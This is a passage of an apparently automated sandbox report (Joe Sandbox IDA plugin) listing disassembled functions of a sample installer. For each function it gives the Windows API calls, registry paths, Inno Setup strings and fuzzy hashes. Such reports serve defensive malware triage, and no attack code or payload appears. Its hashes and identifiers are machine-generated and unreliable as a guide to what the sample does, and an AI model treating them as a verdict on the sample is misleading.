                                                                          • GetSystemMenu.USER32(00000000,00000000,00000000,0047C340), ref: 0047C2D8
                                                                          • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0047C2E9
                                                                          • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 0047C301
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Append$System
                                                                          • String ID:
                                                                          • API String ID: 1489644407-0
                                                                          • Opcode ID: 15f49a51bc99aadf11e624829d5c93e52e60f789ff86a8cde7e3ee935291695d
                                                                          • Instruction ID: e529b759dd7a2e51a8c3bcc96a7d172377ee55af5fc7f1ed5a89e34a1d2f7138
                                                                          • Opcode Fuzzy Hash: 15f49a51bc99aadf11e624829d5c93e52e60f789ff86a8cde7e3ee935291695d
                                                                          • Instruction Fuzzy Hash: 0A31A170B047406AD711FBB59CC2BAA3AA49F51318F54857FB9049B3D3CA7C9809C79D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00450E94 Relevance: 4.6, APIs: 3, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • 74D41520.VERSION(00000000,?,?,?,004917BA), ref: 00450EB4
                                                                          • 74D41500.VERSION(00000000,?,00000000,?,00000000,00450F2F,?,00000000,?,?,?,004917BA), ref: 00450EE1
                                                                          • 74D41540.VERSION(?,00450F58,?,?,00000000,?,00000000,?,00000000,00450F2F,?,00000000,?,?,?,004917BA), ref: 00450EFB
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: D41500D41520D41540
                                                                          • String ID:
                                                                          • API String ID: 2153611984-0
                                                                          • Opcode ID: 7772eee873665419e592b8f0c908b8e340ebe2ab536abffed1c380b4fbd37808
                                                                          • Instruction ID: 38752d589292965b455f679da5e662606514df90b198f4031c48c0776fd97eb8
                                                                          • Opcode Fuzzy Hash: 7772eee873665419e592b8f0c908b8e340ebe2ab536abffed1c380b4fbd37808
                                                                          • Instruction Fuzzy Hash: 3F21A736A04208AFDB11DAA98C41DAFB7FCEB49315F554076FC04E3382D6799E04C769
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0044AC20 Relevance: 4.6, APIs: 3, Instructions: 74COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • 73A1A570.USER32(00000000,?,00000000,00000000,0044AD21,?,0047CB6F,?,?), ref: 0044AC95
                                                                          • SelectObject.GDI32(?,00000000), ref: 0044ACB8
                                                                          • 73A1A480.USER32(00000000,?,0044ACF8,00000000,0044ACF1,?,00000000,?,00000000,00000000,0044AD21,?,0047CB6F,?,?), ref: 0044ACEB
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: A480A570ObjectSelect
                                                                          • String ID:
                                                                          • API String ID: 1230475511-0
                                                                          • Opcode ID: 3e82d226e837a8f6b7b2e24a5f41b75efb5a851a96c6751f784262e8f2c57c71
                                                                          • Instruction ID: 433fe99046f9b8d1d8bc89e2463d1e9b45a303d4827d396566f55289c028a56b
                                                                          • Opcode Fuzzy Hash: 3e82d226e837a8f6b7b2e24a5f41b75efb5a851a96c6751f784262e8f2c57c71
                                                                          • Instruction Fuzzy Hash: 0B21A470E44248AFEB01DFA5C885B9EBBB9EB49304F41847AF500A7681D77C9950CB5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0044A954 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044A9E0,?,0047CB6F,?,?), ref: 0044A9B2
                                                                          • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044A9C5
                                                                          • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044A9F9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: DrawText$ByteCharMultiWide
                                                                          • String ID:
                                                                          • API String ID: 65125430-0
                                                                          • Opcode ID: c13eedb90b8a925426525e5fed0b4ef7f0e424fa92bc79367e1c17be0fc738c0
                                                                          • Instruction ID: 95435d2b4f75e5b2944811cec87d15154efa184d0a126f2c6d3e2a7360284236
                                                                          • Opcode Fuzzy Hash: c13eedb90b8a925426525e5fed0b4ef7f0e424fa92bc79367e1c17be0fc738c0
                                                                          • Instruction Fuzzy Hash: 101108B27406047FEB10DBAA8C82D6FB7ECDB49724F10413BF504E72D0C6389E418669
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0042436C Relevance: 4.6, APIs: 3, Instructions: 59windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424382
                                                                          • TranslateMessage.USER32(?), ref: 004243FF
                                                                          • DispatchMessageA.USER32(?), ref: 00424409
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Message$DispatchPeekTranslate
                                                                          • String ID:
                                                                          • API String ID: 4217535847-0
                                                                          • Opcode ID: 4c72fe453077d3d5441811771d3c73f57da1beb0f02e586e781598996b195a0c
                                                                          • Instruction ID: aef1b0206ccdbb2aa8587e86ea6dacd49c82d9c27d6d10fa8c02d352bba97142
                                                                          • Opcode Fuzzy Hash: 4c72fe453077d3d5441811771d3c73f57da1beb0f02e586e781598996b195a0c
                                                                          • Instruction Fuzzy Hash: 6F11543030432056DA20E665A94179B73D4DFC1B44F80886EF9DD97382D77D9D4987AA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004165B4 Relevance: 4.5, APIs: 3, Instructions: 39COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetPropA.USER32(00000000,00000000), ref: 004165DA
                                                                          • SetPropA.USER32(00000000,00000000), ref: 004165EF
                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 00416616
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Prop$Window
                                                                          • String ID:
                                                                          • API String ID: 3363284559-0
                                                                          • Opcode ID: 5c6b3d06cb009850df356c260b5fd7b3460cba3a8d418ad6d76e3dbffd8df0bd
                                                                          • Instruction ID: a4591c201cec785823d6f09090f19fa17713029ec43dd267bc08175e274880c9
                                                                          • Opcode Fuzzy Hash: 5c6b3d06cb009850df356c260b5fd7b3460cba3a8d418ad6d76e3dbffd8df0bd
                                                                          • Instruction Fuzzy Hash: 3EF0B271701210BBD710AB999C85FA632DCAB49715F160576BE09EF286C778DC41C7A8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041EDC4 Relevance: 4.5, APIs: 3, Instructions: 27windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsWindowVisible.USER32(?), ref: 0041EDD4
                                                                          • IsWindowEnabled.USER32(?), ref: 0041EDDE
                                                                          • EnableWindow.USER32(?,00000000), ref: 0041EE04
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnableEnabledVisible
                                                                          • String ID:
                                                                          • API String ID: 3234591441-0
                                                                          • Opcode ID: 09ca1b9a0e147f9e3f9c02f0c1b7de6c858dacd1e672d107cae65fab239c05be
                                                                          • Instruction ID: 54ed9e8c30520215bbb9e32f791a183ef62373b3d5af12756bdb3ea3c07ca3da
                                                                          • Opcode Fuzzy Hash: 09ca1b9a0e147f9e3f9c02f0c1b7de6c858dacd1e672d107cae65fab239c05be
                                                                          • Instruction Fuzzy Hash: 8EE0E5B81003006AD710AF27DC85A57B69CBB55314F55843BAC0597693E63ED9408AB8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004062A0 Relevance: 4.5, APIs: 3, Instructions: 7COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GlobalHandle.KERNEL32 ref: 004062A1
                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 004062A8
                                                                          • GlobalFree.KERNEL32(00000000), ref: 004062AD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Global$FreeHandleWire
                                                                          • String ID:
                                                                          • API String ID: 318822183-0
                                                                          • Opcode ID: 811b5650058efd060b0480522622cea17f29fa46ba8acc2a698c355084a7e242
                                                                          • Instruction ID: 232b5a29dca1329e6ee8fbf729e049d74cb9239d0bdd557acda0a77be920d3a5
                                                                          • Opcode Fuzzy Hash: 811b5650058efd060b0480522622cea17f29fa46ba8acc2a698c355084a7e242
                                                                          • Instruction Fuzzy Hash: 73A001C4804A04A9D80072B2080BA2F244CD8413283D0496B7440B2183883C8C40593A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00408544 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,0040867A), ref: 00408563
                                                                            • Part of subcall function 00406D54: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406D71
                                                                            • Part of subcall function 004084D0: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,004944C0,00000001,?,0040859B,?,00000000,0040867A), ref: 004084EE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultInfoLoadLocaleStringSystem
                                                                          • String ID: D)I
                                                                          • API String ID: 1658689577-3281296081
                                                                          • Opcode ID: 9103b9db00703e184e34eb4656f7bfd6b4db387a392b2c8979318a7ca80b884a
                                                                          • Instruction ID: f58fcf4e1761da05b427c157ba45b790d79041d0860886b9734fa9e18fdbd457
                                                                          • Opcode Fuzzy Hash: 9103b9db00703e184e34eb4656f7bfd6b4db387a392b2c8979318a7ca80b884a
                                                                          • Instruction Fuzzy Hash: B4316575E00109ABCF01EF95C8819DEB779FF84318F158577E815BB245E738AE058B94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0047CB54 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetActiveWindow.USER32(?), ref: 0047CBF8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ActiveWindow
                                                                          • String ID: InitializeWizard
                                                                          • API String ID: 2558294473-2356795471
                                                                          • Opcode ID: 7279c2e58fd28a7885900cae1b936918ab34a155763bf2546a03f5746716a5ae
                                                                          • Instruction ID: 3ab1797be40594411df6c685a440b4787fcf783bea31960e6df624453c322c8c
                                                                          • Opcode Fuzzy Hash: 7279c2e58fd28a7885900cae1b936918ab34a155763bf2546a03f5746716a5ae
                                                                          • Instruction Fuzzy Hash: C011CE70208244AFD715EB6AFC92F4537A8E355328F2084BBF418CB3A1DB79A801CB0D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004770B4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,004772FA,00000000,00477434), ref: 004770F9
                                                                          Strings
                                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 004770C9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                          • API String ID: 47109696-1019749484
                                                                          • Opcode ID: 71c6e6b3dc286b70a3593d79c622b1ea36892c5bd16880d74348932d8ba95855
                                                                          • Instruction ID: 04cc745cd351e58eb0cff21a747400ae09bf373c4f85ab843473da0d03261e2e
                                                                          • Opcode Fuzzy Hash: 71c6e6b3dc286b70a3593d79c622b1ea36892c5bd16880d74348932d8ba95855
                                                                          • Instruction Fuzzy Hash: 7BF0A7317081246BDA00A65E9C42BAFA7DDCB84758FA0443BF508EB343D9BD9E0243AC
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0046A878 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,?,004950AC,?,0046AB7B,?,00000000,0046B003,?,_is1), ref: 0046A89B
                                                                          Strings
                                                                          • Inno Setup: Setup Version, xrefs: 0046A899
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: Inno Setup: Setup Version
                                                                          • API String ID: 3702945584-4166306022
                                                                          • Opcode ID: 7c674279de04d575b201b80dd7d27308a15b9831806c0875c4ebb08a754ba4da
                                                                          • Instruction ID: 9f8d8e903d06484b85b597de6eb29e8b1ae332426fce2fadbe533b90cf17b58b
                                                                          • Opcode Fuzzy Hash: 7c674279de04d575b201b80dd7d27308a15b9831806c0875c4ebb08a754ba4da
                                                                          • Instruction Fuzzy Hash: 38E06D713016043FD710AA2A9C85F5BBADCDF98366F10403AB908EB392D978DD0186A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0046A8E8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,004950AC,00000004,00000001,?,0046AF1B,?,?,00000000,0046B003,?,_is1,?), ref: 0046A8FB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: NoModify
                                                                          • API String ID: 3702945584-1699962838
                                                                          • Opcode ID: 7eb7c7e6cb67b214b7fefeacd9b811682ceea12d2a12e6196767648bea257352
                                                                          • Instruction ID: 3fa285531c513fb9f209240a3363212c8c226bbd47a131a1ec4299046806267d
                                                                          • Opcode Fuzzy Hash: 7eb7c7e6cb67b214b7fefeacd9b811682ceea12d2a12e6196767648bea257352
                                                                          • Instruction Fuzzy Hash: DAE04FB0640704BFEB04DB55CD4AF6B77ACDB48710F104059BA08EB291EA74FE00CA69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0042DC54 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                          Strings
                                                                          • System\CurrentControlSet\Control\Windows, xrefs: 0042DC6E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Open
                                                                          • String ID: System\CurrentControlSet\Control\Windows
                                                                          • API String ID: 71445658-1109719901
                                                                          • Opcode ID: cac79e148e5d1637301d0cd401e0a8768c8b40d51dfb76d9d00be79e5a4099f3
                                                                          • Instruction ID: fabb803f5ff523eeab3b7a035bb747b9213277980d9d81731b2bf545c5070290
                                                                          • Opcode Fuzzy Hash: cac79e148e5d1637301d0cd401e0a8768c8b40d51dfb76d9d00be79e5a4099f3
                                                                          • Instruction Fuzzy Hash: EDD0C772910128BBDB10DA89DC41DF7775DDB59760F54401AFD0497141C1B4EC5197F4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0042DA38 Relevance: 3.1, APIs: 2, Instructions: 113registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DB70), ref: 0042DA74
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DB70), ref: 0042DAE4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue
                                                                          • String ID:
                                                                          • API String ID: 3660427363-0
                                                                          • Opcode ID: fe899f6043c7f770a4508ac600d0d0e70af19fa3b1a52c17f713553a047210da
                                                                          • Instruction ID: de7305fe23da407263f6a21fe748e6d6d926aae016943a7179aec9e2dd5a457b
                                                                          • Opcode Fuzzy Hash: fe899f6043c7f770a4508ac600d0d0e70af19fa3b1a52c17f713553a047210da
                                                                          • Instruction Fuzzy Hash: 4F417171E04129AFDF10DF91D891BAFBBB8EB01704F918466E810B7240D778BE04CB99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0042DCF8 Relevance: 3.1, APIs: 2, Instructions: 104registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DDF6,?,?,00000008,00000000,00000000,0042DE23), ref: 0042DD8C
                                                                          • RegCloseKey.ADVAPI32(?,0042DDFD,?,00000000,00000000,00000000,00000000,00000000,0042DDF6,?,?,00000008,00000000,00000000,0042DE23), ref: 0042DDF0
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseEnumOpen
                                                                          • String ID:
                                                                          • API String ID: 1332880857-0
                                                                          • Opcode ID: ea84ca3d7e1f6c1c0b6d56cbe1a01e231d4ee03520b80429029a0b90aff89d77
                                                                          • Instruction ID: 8750a336c872ea863c0e9609c16c650b162605484654b044cfb671e23e380797
                                                                          • Opcode Fuzzy Hash: ea84ca3d7e1f6c1c0b6d56cbe1a01e231d4ee03520b80429029a0b90aff89d77
                                                                          • Instruction Fuzzy Hash: D031B370F046496FDB14DFA6DC42BAFBBB9EB48304F90407BE400F7281D6785A01CA29
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040AF38 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AF52
                                                                          • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B0AF,00000000,0040B0C7,?,?,?,00000000), ref: 0040AF63
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$FindFree
                                                                          • String ID:
                                                                          • API String ID: 4097029671-0
                                                                          • Opcode ID: 4a3d0bcc4be787f81902a26f6412a4ca12b3141026bcd8183d147badd2f1fda4
                                                                          • Instruction ID: b3b639975b52532719f451a44c4ce50818db8a334c2074d500fa8c69fc4aeb59
                                                                          • Opcode Fuzzy Hash: 4a3d0bcc4be787f81902a26f6412a4ca12b3141026bcd8183d147badd2f1fda4
                                                                          • Instruction Fuzzy Hash: 4E01F2B1704300AFE710EF69DC92E1A77EDDB897187118076FA00EB3D0DA79AC11966A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041EE14 Relevance: 3.0, APIs: 2, Instructions: 49threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0041EE63
                                                                          • 73A25940.USER32(00000000,0041EDC4,00000000,00000000,0041EE80,?,00000000,0041EEB7,?,0042E804,?,00000001), ref: 0041EE69
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
